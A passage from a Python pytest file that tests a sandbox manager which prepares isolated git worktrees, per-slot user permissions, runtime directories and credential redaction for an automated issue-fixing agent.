== "farm/abc12345/fix-json-bom" + assert ws.branch == "farm/abc12345/fix-json-bom" + head = subprocess.run( + ["git", "symbolic-ref", "HEAD"], + cwd=str(repo_dir), + check=True, + capture_output=True, + text=True, + ).stdout.strip() + assert head == "refs/heads/farm/abc12345/fix-json-bom" + + +def test_rename_workspace_branch_refreshes_shared_metadata(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + root = tmp_path / "ws" + repo_dir = root / "repo" + initial = "farm/abc12345/some-issue" + _init_worktree_repo(repo_dir, initial) + ws = Workspace( + root=root, + repo_dir=repo_dir, + session_dir=root / ".omp-session", + context_dir=root / "context", + artifacts_dir=root / "artifacts", + branch=initial, + repo_full_name="octo/widget", + issue_number=1, + ) + # On Linux+root the rename runs `git branch -m` as the slot uid (2004), + # so the worktree needs to be readable by that uid before the call. + # On macOS dev `_slot_permissions_active` returns False and this + # whole block is a no-op. + if platform.system() == "Linux" and os.geteuid() == 0: + for path in [root, repo_dir, *repo_dir.rglob("*")]: + os.chown(path, 2004, 2004, follow_symlinks=False) + calls: list[tuple[Path, int | None]] = [] + monkeypatch.setattr( + "robomp.sandbox._share_git_metadata_with_slots", + lambda repo_dir, slot_uid: calls.append((repo_dir, slot_uid)), + ) + + rename_workspace_branch(ws, "fix-json-bom", slot_uid=2004) + + assert calls == [(repo_dir, 2004)] + + +def test_rename_workspace_branch_runs_git_as_slot_when_permissions_active( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + root = tmp_path / "ws" + repo_dir = root / "repo" + repo_dir.mkdir(parents=True) + initial = "farm/abc12345/some-issue" + ws = Workspace( + root=root, + repo_dir=repo_dir, + session_dir=root / ".omp-session", + context_dir=root / "context", + artifacts_dir=root / "artifacts", + branch=initial, + repo_full_name="octo/widget", + issue_number=1, + ) + captured: dict[str, object] = {} + + def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]: + captured["cmd"] = cmd + captured["kwargs"] = kwargs + return subprocess.CompletedProcess(cmd, 0, "", "") + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.subprocess.run", fake_run) + monkeypatch.setattr("robomp.sandbox._share_git_metadata_with_slots", lambda _repo_dir, _slot_uid: None) + + new_branch = rename_workspace_branch(ws, "fix-json-bom", slot_uid=2004) + + assert new_branch == "farm/abc12345/fix-json-bom" + assert captured["cmd"] == ["git", "branch", "-m", initial, "farm/abc12345/fix-json-bom"] + kwargs = captured["kwargs"] + assert isinstance(kwargs, dict) + assert kwargs["cwd"] == str(repo_dir) + assert kwargs["user"] == 2004 + assert kwargs["group"] == 2004 + assert kwargs["extra_groups"] == [2000] + + +def test_rename_workspace_branch_is_idempotent_when_slug_unchanged(tmp_path: Path) -> None: + root = tmp_path / "ws" + repo_dir = root / "repo" + initial = "farm/abc12345/keep-me" + _init_worktree_repo(repo_dir, initial) + ws = Workspace( + root=root, + repo_dir=repo_dir, + session_dir=root / ".omp-session", + context_dir=root / "context", + artifacts_dir=root / "artifacts", + branch=initial, + repo_full_name="octo/widget", + issue_number=1, + ) + # No git operation should run; nothing to rename. We assert that by + # passing a non-existent repo_dir — the helper must not touch git. + ws.repo_dir = tmp_path / "does-not-exist" + out = rename_workspace_branch(ws, "keep-me") + assert out == initial + assert ws.branch == initial + + +@pytest.mark.parametrize( + "bad", + [ + "", + "Has-Caps", + "-leading", + "trailing-", + "double--hyphen", + "has/slash", + "has_underscore", + "a" * 51, + None, + 123, + ], +) +def test_rename_workspace_branch_rejects_bad_slug(tmp_path: Path, bad: object) -> None: + ws = _workspace(tmp_path / "ws") + with pytest.raises(ValueError): + rename_workspace_branch(ws, bad) # type: ignore[arg-type] + + +def test_rename_workspace_branch_noop_when_pr_open(tmp_path: Path) -> None: + """A non-None ``pr_number`` makes rename a no-op: an open PR on origin + still tracks the current branch, and renaming would orphan it.""" + root = tmp_path / "ws" + repo_dir = root / "repo" + initial = "farm/abc12345/old-slug" + _init_worktree_repo(repo_dir, initial) + ws = Workspace( + root=root, + repo_dir=repo_dir, + session_dir=root / ".omp-session", + context_dir=root / "context", + artifacts_dir=root / "artifacts", + branch=initial, + repo_full_name="octo/widget", + issue_number=1, + ) + out = rename_workspace_branch(ws, "new-slug", pr_number=42) + assert out == initial + assert ws.branch == initial + head = subprocess.run( + ["git", "symbolic-ref", "HEAD"], + cwd=str(repo_dir), + check=True, + capture_output=True, + text=True, + ).stdout.strip() + assert head == f"refs/heads/{initial}" + # An invalid slug must still be rejected even when pr_number suppresses the rename. + with pytest.raises(ValueError): + rename_workspace_branch(ws, "Bad Slug", pr_number=42) + + +def test_rename_workspace_branch_rejects_non_farm_branch(tmp_path: Path) -> None: + ws = _workspace(tmp_path / "ws") + ws.branch = "main" + with pytest.raises(ValueError): + rename_workspace_branch(ws, "ok-slug") + + +def test_rename_workspace_branch_surfaces_git_failure(tmp_path: Path) -> None: + root = tmp_path / "ws" + repo_dir = root / "repo" + initial = "farm/abc12345/old" + _init_worktree_repo(repo_dir, initial) + # Create a second branch that collides with the rename target. + _git(["-C", str(repo_dir), "branch", "farm/abc12345/new"], cwd=repo_dir.parent) + ws = Workspace( + root=root, + repo_dir=repo_dir, + session_dir=root / ".omp-session", + context_dir=root / "context", + artifacts_dir=root / "artifacts", + branch=initial, + repo_full_name="octo/widget", + issue_number=1, + ) + with pytest.raises(GitCommandError): + rename_workspace_branch(ws, "new") + # Original branch must remain on failure. + assert ws.branch == initial + + +def test_delete_bad_refs_removes_worktree_holding_the_ref(tmp_path: Path) -> None: + """When a bad-object ref is still checked out by a worktree, the worktree's + stale ``HEAD`` keeps fetch failing even after ``update-ref -d`` succeeds. + The repair MUST also tear down that worktree before deleting the ref.""" + from robomp.git_ops import _delete_bad_refs + + pool = tmp_path / "pool" + _init_worktree_repo(pool, "main") + + # Create a worktree on `farm/badhex/bad-branch`. + work_dir = tmp_path / "worktree" + subprocess.run( + ["git", "worktree", "add", "-b", "farm/badhex/bad-branch", str(work_dir), "main"], + cwd=str(pool), + check=True, + capture_output=True, + text=True, + ) + assert (work_dir / ".git").exists() + + fetch_output = ( + "error: object directory /tmp/git-objects-aux does not exist; check .git/objects/info/alternates\n" + "fatal: bad object refs/heads/farm/badhex/bad-branch\n" + "error: did not send all necessary objects\n" + ) + changed = _delete_bad_refs(pool, fetch_output) + assert changed is True + # Ref must be gone from the pool's refs store. + rp = subprocess.run( + ["git", "rev-parse", "--verify", "refs/heads/farm/badhex/bad-branch"], + cwd=str(pool), + capture_output=True, + text=True, + ) + assert rp.returncode != 0 + # And the worktree's `.git` link must be cleared so the next fetch can + # validate connectivity without re-tripping over the dead HEAD. + assert not (work_dir / ".git").exists() + + +def test_delete_bad_refs_noop_when_no_bad_ref_in_output(tmp_path: Path) -> None: + from robomp.git_ops import _delete_bad_refs + + pool = tmp_path / "pool" + _init_worktree_repo(pool, "main") + # Output that doesn't match the bad-object regex. + assert _delete_bad_refs(pool, "fatal: unrelated failure\n") is False + + +def test_ensure_workspace_creates_worktree(tmp_path: Path, upstream_repo: Path) -> None: + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="something is wrong", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + assert ws.repo_dir.is_dir() + assert (ws.repo_dir / "README.md").read_text() == "hello\n" + # Branch is checked out. + result = subprocess.run( + ["git", "-C", str(ws.repo_dir), "rev-parse", "--abbrev-ref", "HEAD"], + capture_output=True, + text=True, + check=True, + ) + assert result.stdout.strip() == ws.branch + assert ws.branch.startswith("farm/") + # Session and context dirs exist. + assert ws.session_dir.is_dir() + assert ws.context_dir.is_dir() + assert ws.repro_dir.is_dir() + assert ws.artifacts_dir.is_dir() + + +def test_chown_workspace_noops_when_not_root(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + calls: list[tuple[list[str], bool]] = [] + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 1000) + monkeypatch.setattr( + "robomp.sandbox.subprocess.run", + lambda cmd, *, check: calls.append((cmd, check)), + ) + + _chown_workspace(tmp_path, 2001) + + assert calls == [] + + +def test_chown_workspace_noops_off_linux(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + calls: list[tuple[list[str], bool]] = [] + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Darwin") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr( + "robomp.sandbox.subprocess.run", + lambda cmd, *, check: calls.append((cmd, check)), + ) + + _chown_workspace(tmp_path, 2001) + + assert calls == [] + + +def test_chown_workspace_runs_chown_and_chmod_as_root_on_linux(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + calls: list[tuple[list[str], bool]] = [] + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr( + "robomp.sandbox.subprocess.run", + lambda cmd, *, check: calls.append((cmd, check)), + ) + + _chown_workspace(tmp_path, 2001) + + # 2001 is the slot-private GID matching the slot UID, not the shared omp group. + assert calls == [ + (["chown", "-R", "2001:2001", str(tmp_path)], True), + (["chmod", "-R", "u=rwX,g=rwX,o=", str(tmp_path)], True), + ] + + +def test_chown_workspace_makes_workspace_slot_owned(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + subdir = tmp_path / "subdir" + subdir.mkdir() + file_path = subdir / "file.txt" + file_path.write_text("data\n", encoding="utf-8") + tmp_path.chmod(0o777) + subdir.chmod(0o777) + file_path.chmod(0o777) + owned: dict[Path, tuple[int, int]] = {} + + def fake_run(cmd: list[str], *, check: bool) -> None: + assert check + if cmd[:2] == ["chown", "-R"]: + uid_text, gid_text = cmd[2].split(":", 1) + root = Path(cmd[3]) + uid = int(uid_text) + gid = int(gid_text) + owned[root] = (uid, gid) + for current_root, dirs, files in os.walk(root): + current = Path(current_root) + owned[current] = (uid, gid) + for dirname in dirs: + owned[current / dirname] = (uid, gid) + for filename in files: + owned[current / filename] = (uid, gid) + elif cmd[:3] == ["chmod", "-R", "u=rwX,g=rwX,o="]: + root = Path(cmd[3]) + root.chmod(0o770) + for current_root, dirs, files in os.walk(root): + current = Path(current_root) + current.chmod(0o770) + for dirname in dirs: + (current / dirname).chmod(0o770) + for filename in files: + (current / filename).chmod(0o660) + else: + raise AssertionError(f"unexpected command: {cmd!r}") + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.subprocess.run", fake_run) + + _chown_workspace(tmp_path, 2001) + + assert owned[tmp_path] == (2001, 2001) + assert owned[subdir] == (2001, 2001) + assert owned[file_path] == (2001, 2001) + assert stat.S_IMODE(tmp_path.stat().st_mode) == 0o770 + assert stat.S_IMODE(subdir.stat().st_mode) == 0o770 + assert stat.S_IMODE(file_path.stat().st_mode) == 0o660 + + +def test_slot_pids_reads_proc_status_and_skips_zombies(tmp_path: Path) -> None: + nonnumeric = tmp_path / "self" + nonnumeric.mkdir() + + live = tmp_path / "123" + live.mkdir() + (live / "status").write_text( + "Name:\tomp\nState:\tS (sleeping)\nUid:\t0\t2001\t2001\t2001\n", + encoding="utf-8", + ) + + zombie = tmp_path / "124" + zombie.mkdir() + (zombie / "status").write_text( + "Name:\tomp\nState:\tZ (zombie)\nUid:\t2001\t2001\t2001\t2001\n", + encoding="utf-8", + ) + + other = tmp_path / "125" + other.mkdir() + (other / "status").write_text( + "Name:\troot\nState:\tS (sleeping)\nUid:\t0\t0\t0\t0\n", + encoding="utf-8", + ) + + assert _slot_pids(2001, tmp_path) == (123,) + + +def test_reap_slot_noops_when_permissions_inactive(monkeypatch: pytest.MonkeyPatch) -> None: + calls: list[tuple[int, int]] = [] + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Darwin") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.os.kill", lambda pid, sig: calls.append((pid, sig))) + + _reap_slot(2001) + + assert calls == [] + + +def test_reap_slot_kills_slot_uid_on_linux_root(monkeypatch: pytest.MonkeyPatch) -> None: + calls: list[tuple[int, int]] = [] + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox._slot_pids", lambda _uid: (111, 222)) + monkeypatch.setattr("robomp.sandbox.os.kill", lambda pid, sig: calls.append((pid, sig))) + + _reap_slot(2001) + + assert calls == [(111, signal.SIGKILL), (222, signal.SIGKILL)] + + +def test_prepare_slot_tmpdir_mkdirs_without_chown(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + chowns: list[tuple[Path, int, int]] = [] + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.os.chown", lambda path, uid, gid: chowns.append((Path(path), uid, gid))) + + tmpdir = _prepare_slot_tmpdir(_workspace(tmp_path), 2001) + + assert tmpdir == tmp_path / ".omp-tmp" + assert tmpdir.is_dir() + assert stat.S_IMODE(tmpdir.stat().st_mode) == 0o700 + assert chowns == [] + + +def test_prepare_slot_tmpdir_replaces_symlink_without_touching_target(tmp_path: Path) -> None: + target = tmp_path / "target" + target.mkdir() + tmpdir = tmp_path / ".omp-tmp" + tmpdir.symlink_to(target, target_is_directory=True) + + prepared = _prepare_slot_tmpdir(_workspace(tmp_path), None) + + assert prepared == tmpdir + assert prepared.is_dir() + assert not prepared.is_symlink() + assert target.is_dir() + + +def test_provision_runtime_dirs_replaces_tmpdir_symlink_and_creates_xdg_tree(tmp_path: Path) -> None: + target = tmp_path / "target" + target.mkdir() + tmpdir = tmp_path / ".omp-tmp" + tmpdir.symlink_to(target, target_is_directory=True) + + _provision_runtime_dirs(tmp_path) + + assert tmpdir.is_dir() + assert not tmpdir.is_symlink() + assert target.is_dir() + assert stat.S_IMODE(tmpdir.stat().st_mode) == 0o700 + for base in (tmp_path / ".omp-xdg" / "data", tmp_path / ".omp-xdg" / "state", tmp_path / ".omp-xdg" / "cache"): + assert base.is_dir() + assert (base / "omp").is_dir() + assert (tmp_path / ".omp-xdg" / "cache" / "bun-install").is_dir() + + +def test_safe_directory_env_scopes_single_repo_path(tmp_path: Path) -> None: + repo_dir = tmp_path / "repo" + + assert _safe_directory_env(repo_dir) == { + "GIT_CONFIG_COUNT": "1", + "GIT_CONFIG_KEY_0": "safe.directory", + "GIT_CONFIG_VALUE_0": str(repo_dir), + } + + +def test_slot_subprocess_kwargs_run_as_slot_on_linux_root(monkeypatch: pytest.MonkeyPatch) -> None: + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + + assert _slot_subprocess_kwargs(2001) == { + "user": 2001, + "group": 2001, + "extra_groups": [2000], + "umask": 0o002, + } + + +def test_prepare_slot_runtime_env_returns_workspace_private_paths_without_chown( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + chowns: list[tuple[Path, int, int]] = [] + calls: list[list[str]] = [] + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.os.chown", lambda path, uid, gid: chowns.append((Path(path), uid, gid))) + monkeypatch.setattr("robomp.sandbox.subprocess.run", lambda cmd, **_kwargs: calls.append(cmd)) + + ws = _workspace(tmp_path) + bun_cache = ws.root / ".omp-xdg" / "cache" / "bun-install" + + env = _prepare_slot_runtime_env(ws, 2001) + + assert env["TMPDIR"] == str(ws.root / ".omp-tmp") + assert env["XDG_CACHE_HOME"] == str(ws.root / ".omp-xdg" / "cache") + assert env["BUN_INSTALL_CACHE_DIR"] == str(bun_cache) + for base in (ws.root / ".omp-xdg" / "data", ws.root / ".omp-xdg" / "state", ws.root / ".omp-xdg" / "cache"): + assert base.is_dir() + assert (base / "omp").is_dir() + assert bun_cache.is_dir() + assert chowns == [] + assert calls == [] + + +def test_share_git_metadata_keeps_pool_writable_for_retry_slot(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + repo_dir = tmp_path / "workspaces" / "octo__widget__43" / "repo" + repo_dir.mkdir(parents=True) + common_dir = tmp_path / "workspaces" / "_pool" / "octo__widget" / ".git" + git_dir = common_dir / "worktrees" / "repo" + git_dir.mkdir(parents=True) + (repo_dir / ".git").write_text(f"gitdir: {git_dir}\n", encoding="utf-8") + (git_dir / "commondir").write_text("../..\n", encoding="utf-8") + + object_dir = common_dir / "objects" / "ab" + object_dir.mkdir(parents=True) + object_file = object_dir / "object" + object_file.write_text("object\n", encoding="utf-8") + object_file.chmod(0o600) + + ref_dir = common_dir / "refs" / "heads" + ref_dir.mkdir(parents=True) + ref_file = ref_dir / "farm" + ref_file.write_text("sha\n", encoding="utf-8") + ref_file.chmod(0o600) + + log_dir = common_dir / "logs" / "refs" / "heads" + log_dir.mkdir(parents=True) + log_file = log_dir / "farm" + log_file.write_text("sha sha bot commit\n", encoding="utf-8") + log_file.chmod(0o600) + + index_file = git_dir / "index" + index_file.write_text("index\n", encoding="utf-8") + index_file.chmod(0o600) + + chowns: list[tuple[Path, int, int]] = [] + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.os.chown", lambda path, uid, gid: chowns.append((Path(path), uid, gid))) + + _share_git_metadata_with_slots(repo_dir, 2002) + + assert object_dir.stat().st_mode & stat.S_IWGRP + assert object_dir.stat().st_mode & stat.S_ISGID + assert object_file.stat().st_mode & stat.S_IRGRP + assert not object_file.stat().st_mode & stat.S_IWGRP + assert ref_file.stat().st_mode & stat.S_IWGRP + assert log_file.stat().st_mode & stat.S_IWGRP + assert index_file.stat().st_mode & stat.S_IWGRP + assert (git_dir, -1, 2000) in chowns + + +def test_ensure_workspace_refreshes_permissions_for_retry_slot_and_session( + tmp_path: Path, upstream_repo: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + chowns: list[tuple[Path, int | None]] = [] + shared: list[tuple[Path, int | None]] = [] + real_chown = _chown_workspace + real_share = _share_git_metadata_with_slots + + def record_chown(root: Path, slot_uid: int | None) -> None: + chowns.append((root, slot_uid)) + # Delegate so subsequent slot-identity git ops can stat the tree. + real_chown(root, slot_uid) + + def record_share(repo_dir: Path, slot_uid: int | None) -> None: + shared.append((repo_dir, slot_uid)) + real_share(repo_dir, slot_uid) + + monkeypatch.setattr("robomp.sandbox._chown_workspace", record_chown) + monkeypatch.setattr("robomp.sandbox._share_git_metadata_with_slots", record_share) + + mgr = SandboxManager(tmp_path / "workspaces") + ws1 = mgr.ensure_workspace( + repo="octo/widget", + number=44, + title="retry me", + clone_url=str(upstream_repo), + default_branch="main", + slot_uid=2001, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + transcript = ws1.session_dir / "turn.jsonl" + transcript.write_text("{}\n", encoding="utf-8") + ws2 = mgr.ensure_workspace( + repo="octo/widget", + number=44, + title="retry me", + clone_url=str(upstream_repo), + default_branch="main", + existing_branch=ws1.branch, + slot_uid=2002, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + assert ws2.repo_dir == ws1.repo_dir + assert ws2.session_dir == ws1.session_dir + assert transcript.is_file() + assert ws2.branch == ws1.branch + assert shared == [ + (ws1.repo_dir, 2001), + (ws1.repo_dir, 2001), + (ws1.repo_dir, 2002), + (ws1.repo_dir, 2002), + ] + assert chowns == [(ws1.root, 2001), (ws1.root, 2002)] + + +def test_ensure_workspace_preserves_checked_out_branch_on_replay(tmp_path: Path, upstream_repo: Path) -> None: + mgr = SandboxManager(tmp_path / "workspaces") + ws1 = mgr.ensure_workspace( + repo="octo/widget", + number=45, + title="retry me", + clone_url=str(upstream_repo), + default_branch="main", + slot_uid=None, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + renamed = "farm/abc12345/renamed" + _git(["-C", str(ws1.repo_dir), "branch", "-m", ws1.branch, renamed], cwd=ws1.repo_dir.parent) + + ws2 = mgr.ensure_workspace( + repo="octo/widget", + number=45, + title="retry me", + clone_url=str(upstream_repo), + default_branch="main", + slot_uid=None, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + assert ws2.branch == renamed + + +def test_ensure_workspace_runs_existing_worktree_git_as_slot_after_chown( + tmp_path: Path, upstream_repo: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + mgr = SandboxManager(tmp_path / "workspaces") + ws1 = mgr.ensure_workspace( + repo="octo/widget", + number=47, + title="retry me", + clone_url=str(upstream_repo), + default_branch="main", + slot_uid=None, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + events: list[tuple[str, int | None]] = [] + git_calls: list[tuple[list[str], dict[str, object]]] = [] + + def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]: + git_calls.append((cmd, kwargs)) + if cmd[:3] == ["git", "remote", "get-url"]: + return subprocess.CompletedProcess(cmd, 0, f"{upstream_repo}\n", "") + if cmd[:4] == ["git", "symbolic-ref", "--quiet", "--short"]: + user = kwargs.get("user") + events.append(("symbolic-ref", user if isinstance(user, int) else None)) + return subprocess.CompletedProcess(cmd, 0, f"{ws1.branch}\n", "") + if cmd[:2] == ["git", "config"]: + user = kwargs.get("user") + events.append(("config", user if isinstance(user, int) else None)) + return subprocess.CompletedProcess(cmd, 0, "", "") + + def record_chown(_ws_root: Path, slot_uid: int | None) -> None: + events.append(("chown", slot_uid)) + + monkeypatch.setattr("robomp.sandbox.platform.system", lambda: "Linux") + monkeypatch.setattr("robomp.sandbox.os.geteuid", lambda: 0) + monkeypatch.setattr("robomp.sandbox.subprocess.run", fake_run) + monkeypatch.setattr("robomp.sandbox._chown_workspace", record_chown) + monkeypatch.setattr("robomp.sandbox._share_git_metadata_with_slots", lambda _repo_dir, _slot_uid: None) + + ws2 = mgr.ensure_workspace( + repo="octo/widget", + number=47, + title="retry me", + clone_url=str(upstream_repo), + default_branch="main", + slot_uid=2002, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + assert ws2.branch == ws1.branch + assert events[0] == ("chown", 2002) + assert ("symbolic-ref", 2002) in events + assert events.index(("chown", 2002)) < events.index(("symbolic-ref", 2002)) + assert events.count(("config", 2002)) == 2 + worktree_git = [kwargs for cmd, kwargs in git_calls if cmd[:2] in (["git", "symbolic-ref"], ["git", "config"])] + assert worktree_git + assert all(kwargs["user"] == 2002 and kwargs["group"] == 2002 for kwargs in worktree_git) + + +def test_ensure_workspace_invokes_slot_chown( + tmp_path: Path, upstream_repo: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + calls: list[tuple[Path, int | None]] = [] + real_chown = _chown_workspace + + def record_chown(ws_root: Path, slot_uid: int | None) -> None: + calls.append((ws_root, slot_uid)) + # Delegate to the real chown so the subsequent `git config` as the + # slot can stat the tree. On macOS dev (uid != 0) the real chown is + # itself a no-op; on Linux+root in CI it hands the tree to the slot. + real_chown(ws_root, slot_uid) + + monkeypatch.setattr("robomp.sandbox._chown_workspace", record_chown) + mgr = SandboxManager(tmp_path / "workspaces") + + ws = mgr.ensure_workspace( + repo="octo/widget", + number=43, + title="something is wrong", + clone_url=str(upstream_repo), + default_branch="main", + slot_uid=2001, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + assert calls == [(ws.root, 2001)] + + +def test_ensure_workspace_provisions_and_slot_owns_runtime_dirs( + tmp_path: Path, upstream_repo: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + owned: dict[Path, tuple[int, int]] = {} + runtime_paths: list[Path] = [] + real_chown = _chown_workspace + + def record_chown(ws_root: Path, slot_uid: int | None) -> None: + assert slot_uid is not None + paths = [ + ws_root / ".omp-tmp", + ws_root / ".omp-xdg" / "data", + ws_root / ".omp-xdg" / "data" / "omp", + ws_root / ".omp-xdg" / "state", + ws_root / ".omp-xdg" / "state" / "omp", + ws_root / ".omp-xdg" / "cache", + ws_root / ".omp-xdg" / "cache" / "omp", + ws_root / ".omp-xdg" / "cache" / "bun-install", + ] + runtime_paths.extend(paths) + for path in paths: + assert path.is_dir() + owned[path] = (slot_uid, slot_uid) + # Same rationale as test_ensure_workspace_invokes_slot_chown: hand + # the tree to the slot so the subsequent `git config` works under + # real slot permissions in CI. + real_chown(ws_root, slot_uid) + + monkeypatch.setattr("robomp.sandbox._chown_workspace", record_chown) + mgr = SandboxManager(tmp_path / "workspaces") + + ws = mgr.ensure_workspace( + repo="octo/widget", + number=46, + title="runtime perms", + clone_url=str(upstream_repo), + default_branch="main", + slot_uid=2001, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + assert runtime_paths + assert set(runtime_paths) == { + ws.root / ".omp-tmp", + ws.root / ".omp-xdg" / "data", + ws.root / ".omp-xdg" / "data" / "omp", + ws.root / ".omp-xdg" / "state", + ws.root / ".omp-xdg" / "state" / "omp", + ws.root / ".omp-xdg" / "cache", + ws.root / ".omp-xdg" / "cache" / "omp", + ws.root / ".omp-xdg" / "cache" / "bun-install", + } + assert set(owned.values()) == {(2001, 2001)} + + +def test_ensure_workspace_is_idempotent(tmp_path: Path, upstream_repo: Path) -> None: + mgr = SandboxManager(tmp_path / "workspaces") + ws1 = mgr.ensure_workspace( + repo="octo/widget", + number=5, + title="t", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + ws2 = mgr.ensure_workspace( + repo="octo/widget", + number=5, + title="t", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + assert ws1.repo_dir == ws2.repo_dir + assert ws1.branch == ws2.branch + + +def test_ensure_workspace_existing_branch_starts_from_remote_head(tmp_path: Path, upstream_repo: Path) -> None: + branch = "farm/abc12345/existing-pr" + seed = tmp_path / "remote-branch-seed" + _git(["clone", str(upstream_repo), str(seed)], cwd=tmp_path) + _git(["-C", str(seed), "checkout", "-b", branch], cwd=tmp_path) + (seed / "README.md").write_text("from pr branch\n", encoding="utf-8") + _git(["-C", str(seed), "add", "README.md"], cwd=tmp_path) + subprocess.run( + ["git", "commit", "-m", "pr branch"], + cwd=str(seed), + check=True, + capture_output=True, + text=True, + env=os.environ + | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + }, + ) + _git(["-C", str(seed), "push", "origin", branch], cwd=tmp_path) + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=77, + title="follow up", + clone_url=str(upstream_repo), + default_branch="main", + existing_branch=branch, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + assert ws.branch == branch + assert (ws.repo_dir / "README.md").read_text(encoding="utf-8") == "from pr branch\n" + + +def test_remove_workspace(tmp_path: Path, upstream_repo: Path) -> None: + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=12, + title="t", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + assert ws.repo_dir.exists() + mgr.remove_workspace(repo="octo/widget", number=12) + assert not ws.repo_dir.exists() + assert not ws.root.exists() + + +def test_redact_credentials_strips_userinfo() -> None: + from robomp.sandbox import redact_credentials + + assert ( + redact_credentials("Cloning into 'x' from https://bot:ghp_secret@github.com/o/r.git failed") + == "Cloning into 'x' from https://***@github.com/o/r.git failed" + ) + # Multiple URLs in one string. + assert ( + redact_credentials("a https://x:y@example.com b https://q:z@example.org c") + == "a https://***@example.com b https://***@example.org c" + ) + # No-op on strings without credentials. + assert redact_credentials("plain message") == "plain message" + assert redact_credentials(None) == "" + + +def test_git_command_error_redacts_url_in_args_and_stderr(tmp_path: Path) -> None: + """An ENOENT-style git failure on a credentialed clone URL must not echo the token.""" + import pytest as _pytest + + from robomp.sandbox import _run + + cred_url = "https://bot:ghp_abc123secret@example.invalid/o/r.git" + with _pytest.raises(Exception) as exc: + _run(["git", "clone", cred_url, str(tmp_path / "out")]) + text = str(exc.value) + assert "ghp_abc123secret" not in text + assert "bot" not in text or "https://bot:" not in text + assert "***" in text or "example.invalid" in text + + +def test_ensure_workspace_rewrites_credentialed_origin(tmp_path: Path, upstream_repo: Path) -> None: + """A pool clone created by an older deploy with `https://user:pass@…` in + `.git/config` must have its `origin` URL rewritten to the credential-free + URL before the next fetch — credentials NEVER persist on disk.""" + mgr = SandboxManager(tmp_path / "workspaces") + # Pre-seed the pool by hand, simulating an older deploy: clone, then + # rewrite `origin` to a credentialed URL pointing at the same local bare. + pool = mgr.pool_path("octo/widget") + pool.parent.mkdir(parents=True, exist_ok=True) + _git(["clone", "--filter=blob:none", str(upstream_repo), str(pool)], cwd=tmp_path) + credentialed = "https://bot:ghp_seekrit@example.invalid/octo/widget.git" + _git(["-C", str(pool), "remote", "set-url", "origin", credentialed], cwd=tmp_path) + config = (pool / ".git" / "config").read_text() + assert "ghp_seekrit" in config # sanity: precondition + + # Now resolve through ensure_workspace using the clean URL we now own. + # The fetch step itself will fail against the bogus example.invalid host, + # so route through a clean local URL by setting it as the canonical + # 